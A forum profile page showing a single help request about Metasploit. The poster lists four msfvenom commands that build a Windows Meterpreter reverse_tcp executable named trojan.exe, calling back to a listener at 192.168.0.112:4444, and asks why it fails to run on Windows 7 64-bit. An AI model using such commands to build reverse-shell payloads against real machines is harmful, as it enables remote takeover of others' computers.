Jump to content

NineTwelve

Members
  • Posts

    1
  • Joined

  • Last visited

Everything posted by NineTwelve

  1. I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable: 1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 2.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 3.) msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe 4.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -k -f exe > trojan.exe I've also tried using encoders and other payloads. I tried running the executables on multiple Windows 7 64-bit OS computers, but all I got was this message: "The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher." When I tried running it in command prompt it showed me this: Unsupported 16-Bit Application "The program or feature cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available." I'm running Metasploit Framework on both Linux Mint and Kali Linux. I've port forwarded the port, tried changing the IP address, turned off all firewalls and AV software, as well as reinstalling Linux Mint and Kali Linux and updating them plus Metasploit Framework. I've tried google to find a solution, but so far I haven't found it. Any ideas on this problem? Any help would be appreciated.
×
×
  • Create New...